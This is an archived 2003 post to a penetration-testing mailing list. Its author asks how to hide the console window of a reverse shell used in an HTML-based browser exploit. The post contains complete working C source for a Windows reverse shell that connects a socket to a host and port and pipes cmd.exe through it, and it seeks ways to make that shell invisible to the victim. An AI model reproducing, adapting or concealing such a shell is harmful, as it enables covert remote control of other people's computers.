freeconsole()

From: Mike Mires (poc_sploit@hotmail.com)
Date: 02/26/03

Next message: F-Prot Antivirus Technical Support: "Regarding F-Prot for Linux"

Previous message: Steve Grubb: "Re: Apache 2.x leaked descriptors"
Next in thread: Oscar Gallego Sendín: "Re: freeconsole()"
Reply: Oscar Gallego Sendín: "Re: freeconsole()"
Reply: Rory Savage: "Non registering shell"
Reply: sk: "Re: freeconsole()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Mike Mires" <poc_sploit@hotmail.com>
To: pentest@securityfocus.com
Date: Wed, 26 Feb 2003 10:25:36 +0000

Hi all,

I am using a basic reverse shell written in C as part of an html based
exploit recently revealed by malware.com. it uses WSAStartup() and
CreateProcess(). I'm looking for a way to hide the console created by
CreateProcess. I’ve tried freeconsole() with no params as suggested by some
sources, however this does not work.

Any ideas would be appreciated.

Thanks

P.S. code i'm using is

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

void main(int argc, char *argv[])
{
// FreeConsole();

        WSADATA wsaData;
        SOCKET hSocket;
        STARTUPINFO si;
        PROCESS_INFORMATION pi;

        struct sockaddr_in adik_sin;
        memset(&adik_sin,0,sizeof(adik_sin));
        memset(&si,0,sizeof(si));
        WSAStartup(MAKEWORD(2,0),&wsaData);
        hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
        adik_sin.sin_family = AF_INET;
        adik_sin.sin_port = htons(55);
        adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
        connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;

CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);

ExitProcess(0);

}

_________________________________________________________________
Overloaded with spam? With MSN 8, you can filter it out
http://join.msn.com/?page=features/junkmail&pgmarket=en-gb&XAPID=32&DI=1059      &nbspH

Next message: F-Prot Antivirus Technical Support: "Regarding F-Prot for Linux"
Previous message: Steve Grubb: "Re: Apache 2.x leaked descriptors"
Next in thread: Oscar Gallego Sendín: "Re: freeconsole()"
Reply: Oscar Gallego Sendín: "Re: freeconsole()"
Reply: Rory Savage: "Non registering shell"
Reply: sk: "Re: freeconsole()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]